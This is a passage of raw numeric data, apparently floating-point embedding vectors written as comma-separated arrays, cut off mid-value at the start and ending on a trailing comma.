.0046840645,0.017606355,0.013331188,-0.029162046,-0.005030451,0.01965739,-0.0011620487,-0.0066924295,0.006398212,0.0088742105,-0.002143485,-0.0046442654,-0.022507258,0.008335588,0.0012891906,0.007303036,-0.0031160784,0.0027905072,0.0054255244,0.0116538545,0.0076826615,0.009606108,0.004932084,-0.0065959822,-0.0036475654,-0.01687834,0.006135681,-0.0017869514,-0.0023043035,0.0037806316,-0.029647069,0.025738409,-0.019655807,-0.02599438,-0.041896395,0.049996603,0.03030692,-0.006995184,-0.017902344,0.0058381017,0.006491575,0.00007393916,0.010938079,-0.031085651,-0.024629915,-0.009150229,-0.0054864376,0.008719605,0.017904222,0.0018195249,0.0035635403,0.021134298,-0.029634053,-0.0026100385,-0.0026500286,0.009107088,-0.0055568963,0.022224015,0.0074483487,0.021876149,-0.012867347,-0.034669846,0.007597203,-0.012418964,-0.020299083,0.009073229,0.01073955,0.043484893,0.014242056,0.0011905506,0.0035888534,-0.013401664,-0.013535011,-0.0035676954,0.0026911183,-0.0599718,-0.0090111755,0.012998954,-0.004711983,-0.01148977,0.010352006,0.0113625685,0.0046787322,0.00861408,0.011693807,0.02103578,0.014976505,0.0015563978,-0.016109271,-0.006906639,0.020461945,0.01566067,-0.007066833,0.003463353,0.010246887,0.009532207,-0.0039874925,-0.025446134,-0.038851097,-0.0015002971,-0.020957306,0.025607152,-0.002151031,-0.02607927,0.0052353702,0.0036662146,0.015635062,-0.044909187,0.012564748,0.020735774,0.04358766,-0.0015217763,0.030783495,0.013790077,-0.010022514,0.026001,-0.011074365,0.016012143,-0.037928224,0.0023025041,0.010802954,0.0182386,-0.008479228,-0.00601681,-0.009175892,0.030244814,-0.016239692,0.0049234247,0.023424355,-0.008305445,0.016507918,-0.0065261833,-0.00082080346,0.03954789,-0.005193639,0.021959344,-0.0010747415,-0.00922317,0.026626451,0.021180047,-0.032482356,0.029509572,-0.017644646,-0.027658444,0.00046741116,-0.0035615868,0.0097323675,-0.023428544,0.01777752,-0.01866314,0.014263961,-0.017049324,0.005287846,-0.016298946,-0.009541686,0.0025573967,0.008845624,-0.015192139,-0.016724022,0.0063027106,0.024018044,-0.011071296,-0.0071341805,0.01038679,0.019126553,-0.017815532,-0.0070508937,0.01252279,0.007240807,-0.013565311,0.008379233,0.009012284,0.0006373949,-0.03186363,-0.031989355,0.02181456,-0.0059291148,0.0011390168,-0.0040927287,-0.008344233,0.008653976,-0.0101306,-0.011255218,-0.01827232,-0.015462392,0.0035324455,-0.0022869927,-0.0094867265,-0.031554632,0.00621092,0.001237873,-0.0134823965,-0.0017343459,-0.003107256,-0.007998373,0.01892849,-0.058941137,-0.029573545,-0.02733808,-0.011157982,-0.0017941453,-0.0074594696,0.0013236731,-0.02704919,0.0096361,0.019844396,-0.0050513037,0.0122956475,0.0075177294,-0.0050796275,0.0012799312,0.017465752,-0.004268689,0.01241427,-0.0021279592,0.030857814,-0.02022177,0.006966062,0.011449381,-0.009888832,-0.0040192283,0.0034765846,-0.009787747,-0.031208852,0.00080324465,-0.016982784,-0.0015740802,-0.00023563401,-0.008135162,-0.002940385,-0.023234589,-0.010455284,0.07823348,-0.042397916,0.00069435436,-0.00874177,-0.003839229,-0.04654457,0.015258292,-0.004227186,-0.0053047673,-0.025920957,-0.014050983,0.0072147837,-0.023443546,-0.026135638,-0.012210029,0.016857486,-0.013522014,-0.012533061,0.021337837,0.010299185,-0.020245168,0.031080397,-0.021167686,0.0048624584,-0.0057515097,0.009372388,-0.012510883,0.0034023684,0.010289879,0.0072392733,0.01336602,0.01609844,0.0009766208,-0.007958168,0.009124236,-0.005490235,-0.008195004,0.016338702,-0.0074980203,-0.0378605,-0.025531294,-0.022477614,0.007355511,0.002009038,0.013179006,-0.017974775,-0.018772753,0.012998044,-0.00066434976,0.09668049,-0.02508399,-0.015092925,0.013577354,0.007275071,0.025372112,-0.0071675973,0.023095157,-0.004989996,0.016576383,-0.00010155862,-0.006862867,0.011013411,0.012694562,0.016138615,-0.019232517,0.019909946,0.119253516,-0.017885221,0.0012445572,0.013886244,0.010049155,-0.00678758,0.007884157,0.006317885,-0.029043414,-0.013673092,-0.041284293,0.0005287576,-0.02213532,-0.038845643,0.024960615,-0.013857103,0.0008449549,-0.0065218783,0.009571816,0.016361468,-0.017047757,-0.015526405,-0.018537017,-0.009369622,-0.018575465,0.013150299,-0.007462008,-0.014179642,0.022402963,-0.03899737,-0.023463491,0.0063193855,0.016400345,0.0124736205,-0.00041121498,0.015539105,0.001925095,-0.0076133823,-0.024394328,-0.011330182,0.0020027324,-0.0073780837,0.0024991094,0.00025991016,0.0049350504,0.010296354,0.032404497,-0.02847287,-0.0074103945,-0.013519834,-0.0004998404,0.016673245,0.01849277,0.003914222,0.016555665,-0.022619706,0.0015166851,0.040566668,0.02244329,-0.01610961,-0.0032592972,0.025418824,0.01361538,0.0022157046,0.0104020415,-0.015021781,0.020300578,0.028683959,0.009671569,-0.007735765,-0.0019530022,-0.012300632,-0.02046363,-0.014382934,-0.0060839844,-0.0052619553,-0.006987632,0.025329664,0.021163728,0.024055948,0.010185897,0.0029373148,-0.0216093,0.002984255,0.039211147,0.0013196497,0.006620598,-0.008627339,-0.002857189,-0.014328159,-0.03411137,0.0075217485,0.017584803,-0.011789693,0.01955852,-0.001105455,0.006264259,-0.002590869,-0.018518643,-0.011352577,-0.005853664,-0.027166229,-0.0003248082,0.006222444,0.002850736,-0.0015423456,0.021032076,-0.017506538,-0.013561993,0.014340206,-0.012454435,0.0042497045,0.022767784,0.014988302,0.022995085,0.0019049696,0.040703684,0.014718056,-0.01529566,0.00258527,-0.038257387,-0.014610298,-0.019466167,-0.00091404904,-0.0033582842,0.001238159,0.007509975,-0.020576824,-0.014926261,-0.004927514,-0.019527443],[0.013035914,0.013310329,-0.017896758,-0.015944108,0.015391973,-0.025396075,0.005381677,0.022469813,-0.008740625,-0.011303723,-0.0023243774,0.0015093042,0.0085714385,0.008501928,-0.002361646,0.020306736,0.004680797,-0.009237885,-0.016764427,-0.013286446,-0.0019501543,0.0090101585,0.025740253,0.003927335,0.015707316,-0.0052404245,-0.006834192,0.0118802935,0.026081096,0.0020180165,0.0008249573,0.018740268,-0.012398904,0.0040484173,0.0097371675,0.0032066675,-0.01529864,-0.021766596,0.016392564,-0.007001493,-0.0140322745,0.020657197,0.005528394,0.030409595,-0.002584694,-0.0074620615,-0.0019259793,-0.00048055773,-0.009787049,0.00785811,0.010009296,0.0031848303,-0.045749538,0.020110369,0.004755609,0.0061224075,0.010448667,-0.030734088,0.020620046,-0.0041264957,-0.00325117,0.016656594,0.020504585,-0.028952746,0.019077001,0.000979127,-0.0073367977,-0.046989795,0.013199534,-0.0113517465,-0.0004910756,0.0005178055,0.012727115,0.009340773,0.021456245,0.017990535,-0.00020073153,-0.0077444804,-0.012594885,0.018614987,-0.030733284,-0.0016838171,-0.0021611114,-0.011727809,0.010764926,0.023169963,0.0057975543,0.0009971816,-0.008678809,-0.016988924,0.00025801605,0.00076222327,0.009169605,-0.0073359516,-0.004726253,0.0155359125,0.0011618031,-0.014325297,0.0049906704,0.016360292,0.0017345942,-0.019772682,-0.014450222,0.011701317,-0.009085632,-0.007014489,-0.00441182,-0.010506865,-0.0035914332,0.005185815,0.0006135725,0.01666876,0.0020393252,0.008419226,-0.004567113,-0.013956426,-0.012895057,0.0058597545,-0.004259994,-0.002225325,0.015190127,0.023601199,0.00791653,0.010918491,-0.013633093,0.0049531166,-0.020677023,0.024148861,0.00094100984,0.016191976,-0.002407456,0.0035183248,-0.017519832,-0.011838555,0.003249665,0.0017716221,-0.0019810202,-0.010303005,0.0128179975,-0.000037306294,0.016418,-0.006985019,0.002911436,0.008572876,0.008006493,0.024403939,0.0008359058,0.0050013596,0.019213403,-0.009084262,0.0007419448,-0.0004880762,0.020088172,-0.008307436,0.0035124659,0.013180849,-0.002240228,-0.007879296,-0.0063589993,0.0015607502,0.007443939,-0.0047655683,-0.0085398,-0.0037571054,-0.004591818,-0.029667132,-0.013609655,-0.01826736,-0.023359884,0.008085382,0.018701,0.034278303,0.015055724,0.007161497,-0.0054055424,0.017320028,-0.020236805,-0.010066249,0.0091483565,-0.01447356,0.01792872,0.016869007,-0.016439736,-0.0070344033,-0.021261266,0.019181268,0.02450904,0.008501225,-0.007423889,-0.011196181,0.0111643905,-0.013963218,0.008286032,-0.002809312,-0.016460003,-0.03176467,-0.010730942,0.07992623,-0.023701673,0.004835952,-0.007071215,-0.005170757,0.005565979,-0.039474785,-0.002275037,-0.0035200974,0.012369213,0.0008731706,0.019471146,0.0043302877,0.0015978841,-0.004461463,-0.003153763,0.009567109,-0.0031938367,-0.069548674,0.02940686,0.010604549,0.009043352,-0.015367064,-0.018790375,0.00457202,-0.0012981371,-0.011699178,-0.013923424,-0.00837031,-0.022742357,0.0037261294,0.010516066,-0.020197308,0.014132395,-0.0043087825,-0.013405941,-0.015708456,0.019276923,-0.0046074674,-0.0026493417,-0.008657897,-0.007314499,-0.0012736673,-0.0015874095,0.007121893,0.008244716,0.02395674,-0.0039738915,-0.015795266,0.007829348,-0.008373108,-0.012117767,0.013198247,-0.00013287291,0.00292832,0.0035295042,0.026730785,-0.016745517,-0.034730103,0.020737996,-0.014418777,0.0035662362,-0.0070068487,0.027637338,0.023647236,-0.02481971,0.017155482,0.033566624,-0.012691444,0.003155211,-0.04798725,-0.0020392465,-0.02517203,-0.008605715,0.033064503,0.0038748672,-0.0075095845,-0.0033355113,-0.020292878,0.0216961,0.008010979,0.001982148,-0.000707932,-0.0015631927,0.012029568,0.0065159015,-0.016161779,-0.0022622722,0.024573214,0.005393985,0.015256265,0.035244875,0.00413975,0.009616198,-0.013766657,0.029136458,0.003194665,-0.014552519,0.021143293,0.00096643216,0.013087322,0.017450225,-0.019196073,0.022277502,-0.0006295996,0.01094787,0.000039913484,-0.0016501811,-0.0019128163,-0.02482395,0.03151358,-0.037655827,0.013079769,-0.037408885,-0.019734642,-0.014472383,0.003349888,0.012677088,0.014635922,-0.009254937,0.0028468834,-0.0068892124,-0.0069740624,0.011480857,-0.027617654,0.020240277,-0.0132998135,-0.025092646,-0.008755473,0.0030204777,-0.023512593,0.01560601,0.016118439,0.00690418,0.011370374,0.019716127,0.018699337,-0.02127769,0.016177846,-0.022486813,0.040660292,0.0005413672,-0.0067487685,-0.025879767,-0.016751155,-0.011015271,0.011517109,0.004651411,-0.016649352,0.011186147,-0.004261745,0.008839191,0.012999306,0.009232493,-0.03776188,-0.01333116,-0.0040835505,-0.041161977,-0.003722357,-0.011929435,-0.002687426,0.006780591,-0.02067736,0.01959443,-0.014692856,-0.019980242,0.012323578,0.07959085,0.004260857,-0.015216054,0.005466823,-0.0112159485,-0.0041733254,0.03369232,0.011033233,-0.0036081409,0.00013178588,-0.00027462517,-0.021686377,0.0044554085,0.013170977,-0.005099486,0.002256248,-0.020319913,-0.018992696,-0.030086597,-0.02559039,0.028643994,-0.012757474,-0.003596357,0.0119985435,0.012592285,0.012584923,0.00026806962,-0.003328462,0.013661909,-0.01056771,-0.012997714,0.012959968,0.033024397,0.014011631,-0.03168973,0.017072594,0.026026947,-0.02115993,-0.034568295,0.0064208396,0.009936019,-0.0058088107,-0.004692148,-0.022512594,-0.011984977,0.042942893,-0.0072707124,-0.019352771,-0.013422499,0.029016335,0.019392544,0.016721902,-0.01954951,0.015460595,-0.0025238255,0.012098289,0.01757363,-0.034014493,0.020617666,0.03355298,0.007901933,0.028338011,0.0063544326,-0.005989875,-0.011789463,0.018531686,-0.012428812,-0.013188599,-0.006829371,0.00048665496,-0.0014853344,0.0046077752,-0.003456945,-0.0053685256,0.0036999465,0.019215746,-0.006176699,-0.01485092,0.014701733,0.04857125,-0.02163233,0.0021515829,0.012252902,0.005826436,0.0066974363,-0.011404419,0.0012089653,0.00036205558,0.01311334,-0.01261497,-0.0035478214,-0.005882437,0.019874213,0.013263949,0.0062637804,0.026641812,0.021963269,0.027281534,0.004616331,0.0043678167,0.005448918,0.006725974,0.014126483,-0.016675405,-0.004544611,-0.002566881,0.010552591,-0.0068485304,0.0056498917,0.028926874,-0.023020359,0.015214996,-0.008464051,-0.024257232,-0.004536171,-0.0036517668,-0.0017012535,-0.02602263,0.001802291,0.0042471704,0.024287399,-0.014522817,0.013600907,0.0017509784,-0.0032226616,-0.004960574,-0.0047455877,-0.026143014,0.0033380268,0.028373381,-0.0026003744,0.00318594,0.013873357,-0.034136266,0.040378954,0.012628796,-0.0154409995,-0.026281746,0.031560183,0.015635116,-0.0026994362,0.028541168,0.011708456,0.0056480947,-0.0068804147,0.0409466,0.03766065,-0.0067857495,-0.02800696,-0.0047656856,-0.0033028983,-0.011856204,0.009146586,-0.013770359,0.008489494,-0.00015585661,0.03157429,-0.018171513,-0.01825311,0.008324424,0.012674513,-0.03328518,0.0014691335,-0.0070888842,-0.020121427,0.033723086,-0.014759242,0.053652953,-0.005397519,-0.031726584,0.00081928284,0.019423906,0.0051398603,0.00047143092,0.0047985762,-0.016440725,0.008484669,-0.017894134,0.029320342,-0.017315902,0.022475215,-0.029099107,-0.005626614,0.0007473077,0.013926797,-0.032410517,-0.0037189142,-0.002363679,-0.022158632,-0.012292163,-0.026121516,-0.015081016,0.034246545,0.012606088,-0.0021439472,-0.041659698,-0.008150573,-0.0053380667,-0.008274567,0.027456326,-0.00264119,-0.0143902395,-0.007400717,0.014600551,-0.0075863083,0.005659407,0.038220212,-0.013644009,0.0034663307,-0.0036001913,0.0141672315,0.028368147,0.010084209,0.013750436,0.024127608,0.023710635,-0.020250387,0.008544383,0.025320446,0.027768824,0.009830285,-0.02373926,-0.0053977272,0.0043566385,0.009425355,-0.02810419,0.0051842653,-0.012677351,0.0044069835,-0.025651786,-0.007990072,-0.006929682,-0.018562585,0.010232322,0.00023419509,-0.003492124,-0.039204728,-0.0053423457,0.015775979,0.0024951966,-0.020174075,0.013325168,0.029245835,-0.0017496598,0.014803928,0.018131558,-0.016828297,0.011190054,0.010631711,-0.0017383775,-0.0018876536,0.018870056,0.018958947,-0.014474449,-0.008742677,0.00093493686,-0.0016034597,-0.0038391503,-0.01730844,0.012245757,0.027061136,0.01242746,0.008293425,0.0036831659,-0.022637278,-0.00011117641,0.008758219,-0.02922144,-0.0057858867,-0.014002745,0.03173508,-0.0074607995,0.0019171236,0.016981972,-0.014675815,-0.00806068,-0.008846161,0.022583941,-0.03383517,0.006218321,-0.018822307,0.0068287365,-0.002152807,0.030783512,-0.0051684766,0.009981416,-0.0033381903,-0.014295884,-0.0032446848,0.00020009799,-0.010421653,-0.0013501161,0.0067989784,0.0068712644,-0.04774703,-0.016917659,-0.014070223,-0.05365205,-0.012571456,0.021929279,0.024962205,0.013619796,0.015767815,0.011733686,0.014864243,-0.022200553,0.010278487,-0.044377536,0.015389797,-0.0014709404,-0.045184948,0.024879584,0.024130974,-0.0032683767,-0.010770971,-0.021669907,0.0073677567,-0.0053411797,0.027215134,-0.010320519,-0.0033587585,0.019199751,-0.013616395,0.02100581,-0.02088029,0.015245538,0.013188704,0.026001303,0.0021575252,-0.004872522,0.002274983,-0.009105113,-0.025625555,0.006855635,0.016398769,0.017972074,-0.0068570795,0.02594369,-0.012985332,0.00088752044,0.0013219115,-0.014148503,-0.0028418477,0.04082859,0.025871316,0.0010218762,0.025466843,-0.015019224,0.032777626,0.00020765928,-0.0092692515,-0.031508062,0.008712688,0.026998779,0.0029710392,0.025826588,-0.0018260573,0.000533956,-0.024542976,-0.0075328527,-0.011724148,0.008742891,0.008862144,0.015127174,0.015524218,0.018628491,-0.012905584,-0.013358614,-0.009534652,-0.011841827,-0.0028412356,-0.03073581,0.029044673,-0.008548026,0.0017697617,-0.05253871,0.007956701,0.017231014,0.0137204705,-0.0025239778,-0.019313129,-0.004035354,-0.0006503098,-0.020692019,-0.023165995,-0.046475034,-0.0053215874,0.021509029,-0.02710294,0.01741687,0.013803726,-0.0057814396,-0.0039922623,0.0268286,-0.013376465,-0.034096222,0.0018093436,-0.01201584,0.023893343,0.018848475,0.021845153,-0.0008723955,-0.000053815846,-0.008337926,-0.021323679,-0.006966317,0.009968705,-0.009862497,0.0069703106,0.012522798,-0.0011514848,-0.011023361,-0.01633714,-0.023455057,0.011701933,-0.047337953,-0.0056569357,-0.021692744,0.009940569,-0.006026826,0.0036447574,-0.022257261,0.029406017,0.016690398,-0.021834562,0.00977415,0.007106928,-0.006025023,0.027521122,0.036612153,0.0024200615,-0.036370434,0.0030115137,0.03817371,-0.0039365217,0.021614725,-0.006868981,-0.035792414,-0.031172121,-0.027055526,0.011661298,-0.019227887,0.017486565,0.007654505,-0.035111286,0.017923366,-0.01362156,0.017322501,0.013831672,0.022481913,-0.00053021737,-0.013331819,0.00712389,-0.017682405,-0.00681501,0.0040472555,-0.012662597,-0.014610823,0.006126905,-0.02113712,-0.02735627,-0.032004554,-0.006123451,-0.0060861846,0.012274891,-0.0033968845,-0.0057409042,-0.024259765,0.02265764,-0.005172709,0.009764784,-0.019663133,-0.024775984,0.010005155,0.002683877,0.021350866,0.011425227,-0.00097331434,0.037959263,0.011087814,-0.021004148,0.015409628,-0.004293968,0.008559576,-0.011262169,-0.009116859,-0.01800656,-0.013450025,0.02609781,-0.016757207,0.011540804,0.02592263,0.00560487,-0.004918284,-0.0033681921,-0.020035697,-0.011035194,-0.02074805,0.01590196,-0.025274368,-0.006223574,0.0033741498,-0.022095311,0.010052544,-0.0028935014,0.017857913,-0.008334266,-0.00029887696,0.03233521,0.0041525867,-0.0228432,-0.011000003,0.008179315,0.002015707,0.012252204,0.0033651812,-0.012265128,0.01258645,0.036676258,-0.010332059,-0.0012424443,0.019670995,-0.00016173453,0.013032729,-0.010191574,0.015908692,-0.005754175,0.008220035,0.032940567,-0.025052857,-0.008021658,-0.00987031,-0.0058711986,0.003422656,-0.026269728,0.0009478811,-0.0070178183,0.008329131,0.028129265,-0.023412181,0.012460837,-0.019002184,0.0049231336,-0.018803222,0.0069832457,0.010397598,0.025955103,-0.011751861,-0.0106248725,0.015429091,-0.0070185494,0.008609184,0.0003873986,-0.0030606915,-0.001178156,-0.006089399,0.0073450883,0.0035130244,-0.009317763,0.0042104707,0.037456285,0.021647202,-0.0120207295,-0.033896487,-0.0045120595,0.00569596,-0.0043410966,-0.01742213,-0.013767856,0.014136692,0.020838996,-0.010603375,-0.026889455,-0.032887813,-0.03696311,0.03447239,-0.010775448,0.009663951,0.008618496,-0.00533885,-0.019046769,-0.005569765,0.015760541,-0.01994811,0.007158592,-0.0057737553,0.0053357487,0.0036473742,0.0193844,-0.002774181,-0.009178324,-0.008095674,0.0042194384,0.004437134,0.004114921,0.008765285,0.0017310006,-0.0057955026,0.022135504,0.011853516,-0.012056886,-0.004453788,-0.03982019,0.008126884,-0.00245871,0.009834045,-0.004162487,-0.016294636,0.0062174583,-0.0004291528,0.010899048,0.0109112365,-0.016751004,0.00593388,-0.00040411227,-0.0075075296,-0.006771449,0.023133352,-0.018100617,-0.027567117,0.0005793172,-0.020411743,-0.017963462,-0.016114261,0.04099371,0.004673221,-0.012169955,0.0009611855,-0.0034319276,0.013259942,-0.0058037713,0.0041483734,0.023099683,0.008234099,0.008034126,-0.016710868,0.005818927,0.009330655,-0.028840799,0.007565825,-0.011871266,0.034998607,0.009746927,-0.0055243545,-0.017870255,-0.016184721,-0.008608013,0.011686041,-0.029605983,0.015874028,-0.0255238,-0.011630015,-0.005716191,-0.031920664,-0.011117718,-0.004433513,-0.032134227,-0.005320396,-0.018202746,-0.016942127,0.009849134,0.002003753,0.008504798,-0.012882505,-0.014963032,0.000236634,-0.013529007,0.0067047947,0.0047665765,0.029363453,0.011352138,-0.016806956,0.0010361841,0.00794902,0.019071346,-0.02270293,-0.012507508,0.04575772,0.0009905314,0.0008518603,-0.008016641,0.01865865,0.01170408,0.026551817,0.017393718,0.02714934,-0.00025510587,0.015569546,0.018682387,0.023374397,0.0038385682,0.02262289,0.021743191,0.024668958,-0.0020021203,0.0032163376,0.023431633,0.019546308,0.017212773,0.020443369,0.023659188,0.027960144,-0.01996019,0.013145667,-0.017683968,0.021655658,0.022700943,0.0042805667,0.02171893,0.0077219238,0.0017389207,-0.012005863,-0.0024224117,0.010245647,-0.018701945,-0.015548466,-0.008171211,-0.014595743,0.02120311,-0.008232512,0.02226717,0.014682326,0.0045326743,-0.00019729508,0.007239414,-0.020582037,-0.0071714036,0.0044953194,-0.0013304469,0.0046213907,0.0033012745,-0.027154874,0.00952748,0.01827471,-0.011465869,-0.02890044,-0.002987746,0.0077592772,-0.010713468,0.004537812,-0.002449959,0.0038552743,-0.02412825,-0.014027951,-0.003267298,0.017174238,-0.0134267295,0.028392514,-0.016414259,-0.008970925,0.019335166,0.029370306,-0.0013077662,-0.00515205,-0.01250309,0.014928358,0.01348745,-0.011100674,-0.014288269,-0.0140018575,-0.013377283,-0.005572949,-0.012837969,0.004168209,0.0026977872,-0.0043000756,0.007834622,-0.009479627,-0.032174252,0.039839476,-0.0010231744,0.02444875,0.009347459,-0.013089611,0.0037749985,0.011725624,0.013020891,0.00666411,-0.023606678,-0.00046689823,0.0070371777,-0.03703735,-0.0060081943,-0.00822377,-0.004005684,-0.010124283,-0.016861673,-0.0062897867,-0.006938452,0.0065571866,-0.017123643,0.0078099854,0.019370338,-0.028393056,0.014925992,0.032104075,0.0050747828,0.010217945,-0.0021743504,-0.009970592,0.03748115,0.014264976,-0.011773937,-0.01910538,0.017280903,0.0019759976,0.019290768,0.011500288,-0.025231156,-0.00086069724,0.003432696,0.024060784,0.010975826,-0.0060794554,0.011360078,0.014850128,0.0277764,-0.014385176,-0.016740955,0.020734718,-0.0028967373,-0.0036208797,0.012246412,0.01558363,0.003957011,0.007813668,-0.00023415657,-0.0012446964,-0.014301976,0.002678747,-0.013675438,-0.009247651,-0.005625244,-0.016687125,-0.022382373,0.00017235318,-0.0068043675,0.0020914336,-0.020015767,0.017014895,0.0069029653,0.00700622,-0.0013887647,0.020311974,0.011032477,0.0063033793,-0.026471928,0.011375435,-0.00076355436,0.0030748525,-0.019267041,0.019363046,0.008376639,0.018830195,0.0059907576,0.0068736393,0.0009249298,-0.04339652,0.030037541,0.02597417,-0.013664214,-0.01926432,0.012446372,-0.001286067,-0.01114103,-0.032198902,0.009901622,0.0002193258,0.0005097994,0.0069336277,-0.0060701803,-0.0065701553,-0.0025014216,-0.027627742,0.062870495,-0.003893132,0.0058721527,-0.017185904,0.020131063,-0.0073720203,0.013014671,-0.009607,-0.015176227,-0.020093527,-0.04654286,-0.023783505,-0.005878623,-0.023562215,0.0072834077,-0.004524301,0.0023869157,0.0037204963,0.0054840236,0.010917117,0.0028126682,-0.012287033,0.00013083551,-0.0015641283,-0.0040916926,-0.007376942,0.028142592,-0.01566768,0.008687027,-0.00827615,-0.0063003898,0.0070898174,0.03395,0.0042355144,-0.015295694,0.0041278778,-0.0019098397,-0.003668146,-0.017141175,-0.0144648105,0.003774951,-0.022508878,0.04424715,-0.0056094346,-0.0026506663,-0.0036996102,-0.0013265888,0.00095556263,0.010509715,-0.021475578,0.008177172,0.0030278338,-0.012846485,-0.009128584,-0.016943116,0.0025883503,0.0013613491,0.01488839,0.019343194,-0.0089985235,0.015438586,-0.0055368454,-0.0015592241,0.00435539,-0.009380866,0.01466121,0.019550944,-0.017263493,0.0071934676,-0.01364002,0.013177477,-0.0001606088,-0.017071819,-0.0011654185,0.004331288,0.010532099,0.005812592,-0.00855811,0.012695255,-0.015589012,-0.014648363,-0.008993743,0.026356038,-0.0108044725,-0.026381986,0.01736282,0.010101384,-0.009153334,0.05951857,0.005532595,0.019055689,-0.000085596716,0.005936279,0.003942913,0.025627004,0.015922112,-0.0029600628,0.003402799,-0.019853009,0.0033523003,0.004460462,0.011302761,0.029260222,-0.011372669,0.024405012,-0.0022645646,-0.005686169,-0.024853453,-0.0065861996,0.011429838,0.015325559,0.007496722,-0.005744824,0.011420085,0.020997727,0.019305827,0.021698184,-0.006311224,-0.011251511,-0.0010086998,0.018154437,0.0017993104,-0.017539913,-0.053115178,0.018632028,0.14322057,0.008211499,-0.026293932,0.021076035,-0.0015120587,0.009773269,-0.09823663,0.011976108,-0.002832905,-0.018113445,0.008422052,-0.004218658,-0.007527511,0.00948062,0.0126308445,-0.0014542709,-0.0072250916,-0.007208092,0.0287474,-0.004706092,-0.009992911,0.002658346,-0.026123105,-0.009601813,-0.039754014,-0.011771414,-0.011800943,-0.002510812,-0.0122481845,-0.0210897,-0.010580011,-0.013731061,0.007615017,0.0017909321,-0.022692177,0.009557289,0.0025097162,0.022118581,-0.0027596795,0.017646773,0.03248728,0.009750852,-0.007184605,-0.032687787,-0.15508835,0.0047827973,0.0012292471,-0.039255142,0.026070613,-0.013869515,0.004380302,0.0024831851,0.006213712,-0.010355241,-0.0042079743,0.028694833,-0.005309886,0.023194827,-0.026713502,0.00030245335,0.004036851,-0.019439716,0.006016106,-0.00738973,-0.0044487477,0.0015580762,-0.012898238,-0.03764905,-0.026524795,0.012834337,0.0021855533,0.035187267,-0.015501574,0.010919888,-0.019278422,0.016009914,-0.031647988,-0.0009228796,-0.0028182257,-0.021712454,-0.012071384,0.0049065617,-0.0025343557,0.023271326,-0.018703388,0.0019344472,0.0015806432,-0.0073110037,-0.0105806,0.011907971,0.0013166418,0.025661834,0.02126838,-0.0070594577,0.0251179,0.00035429758,-0.006307585,-0.00044195494,0.009648844,-0.0055261236,-0.004604155,-0.022547217,-0.01570706,0.0029839347,-0.01430472,-0.007284911,-0.0020079478,-0.025507797,0.052322164,-0.003871179,0.02275744,-0.021024695,0.005922492,0.008648523,0.00399838,0.0029310395,0.013142263,-0.014452728,0.008344978,0.01626354,-0.014803865,0.00080607686,0.014888594,-0.008505632,-0.006120543,0.0075663966,0.0035386204,-0.016070113,0.020848457,-0.021685237,-0.010776544,0.018661233,0.0016287962,-0.015035337,0.019834934,-0.01863032,0.012065654,-0.0023177802,0.023683092,-0.0055660047,0.053394996,-0.018914647,-0.027959744,0.018295107,0.003853655,-0.021743966,-0.015208891,-0.0028909005,-0.002525688,0.006262774,-0.013515098,-0.027519463,-0.03095276,-0.001793702,-0.022133464,0.011411107,0.031131575,-0.0014572472,-0.014088251,-0.006667995,0.012897087,0.0034972567,0.0128798615,-0.00054547784,-0.02709029,0.008635657,-0.007439413,0.023117526,0.04543493,0.016360108,-0.017015347,-0.0055950535,-0.009719815,-0.0023363808,-0.008600818,0.014340755,-0.0058600972,0.008468365,-0.02268019,0.0004654037,-0.0200248,-0.0062907054,-0.027206404,0.0014791724,0.013836371,0.0010150109,0.008255102,0.004819623,0.0203068,-0.020203646,0.041807745,0.007645745,-0.003726351,0.0015596884,0.0071907663,0.031656083,-0.03503873,-0.034586105,0.014773273,0.068992026,0.011269218,-0.015043902,0.005020762,0.0033261024,0.013213394,0.011978299,-0.0141249765,0.0034761988,-0.004036262,-0.028797211,0.010671673,-0.0145191485,-0.0044459086,-0.022471415,0.035210148,0.0015942039,0.02019339,0.0035009081,0.006029837,0.010765654,-0.0016872723,-0.0068862764,0.0138206,-0.005538551,0.003652825,-0.0019263721,0.006724978,0.003481308,0.0007866033,0.005393289,-0.017952757,-0.010502789,-0.00004357615,0.009952173,-0.044665445,0.003711831,0.009550613,-0.0019615612,-0.009280897,-0.0007215465,0.021208614,0.008127091,-0.008917085,0.0030805983,-0.010274113,-0.014228186,-0.00673963,0.026235329,-0.012889879,-0.00007588852,0.008232962,0.0082000345,-0.0013803381,0.0087862015,-0.013850644,-0.00044126762,-0.003888314,0.00023702161,-0.0120019205,0.027470754,-0.0077752,-0.023903672,-0.0076860995,-0.017396102,-0.0033813128,-0.008146966,-0.0007669806,0.0044956277,0.014500936,-0.0046082623,0.008647136,-0.012036887,0.010487592,-0.0020781378,-0.010518238,-0.017307572,-0.017674834,-0.011920911,0.016641458,0.0061892355,0.011508039,0.00006838596,0.0016894374,-0.034867834,-0.051051293,0.007948859,0.041760996,0.00107442,0.003135636,-0.012278994,0.008339388,0.02370099,0.0013711399,0.012703987,0.0068040607,0.019944035,0.012902313,0.020825462,0.0015989093,0.0008788635,-0.012120811,0.015462122,-0.027373806,-0.014413715,-0.01567097,0.004312793,0.008209338,0.010148625,-0.0084424885,0.012179159,-0.015037775,0.0009212351,-0.025839932,-0.008027628,0.030243004,-0.012404281,-0.008486784,0.022776878,-0.0015015682,-0.0069068833,0.0020714852,0.0004491608,0.00032430413,0.014433664,-0.032618262,0.018812401,0.0033715686,-0.020697357,0.009553912,0.015081064,0.031999186,0.012337001,-0.012161784,-0.015421501,0.0006692623,-0.0124978805,0.023567842,0.0045259483,0.025058571,-0.0238218,-0.0019539727,-0.007998583,-0.0037066508,-0.0017039414,0.010398711,-0.011764189,0.0041411123,-0.015173545,-0.0023074236,-0.028892355,0.011299821,-0.0018200098,-0.013293096,-0.0064437827,-0.005054949,-0.021722745,-0.008744816,-0.02050396,0.0038164607,0.0020451774,0.023892328,0.00019831558,0.0026745389,-0.010419385,0.030773142,0.01571561,-0.009473021,0.031846553,0.0028920034,0.011459912,-0.01144646,0.010065035,-0.01602979,0.007958048,-0.008107334,0.0117587475,0.015744941,-0.0024437471,-0.013814477,0.018307066,0.013029657,-0.010145494,-0.01207713,-0.010317098,0.015110527,-0.012967253,0.038695443,-0.0063667563,-0.0137146,-0.0137084555,-0.010149041,-0.01031323,-0.008506979,-0.0068007507,0.0020908387,0.018378234,-0.003523958,0.0070108916,0.018706257,0.0013217669,0.0377882,-0.009004765,-0.024064682,-0.0051479815,0.006399474,0.027771495,-0.007993637,0.022306988,0.0051923906,0.005122835,-0.0018167549,-0.016336164,0.008931105,0.0025888702,-0.021154715,-0.009438366,0.021306807,0.0034768546,-0.03850079,0.0040500565,0.0061343345,-0.0027227104,-0.017006874,0.009970518,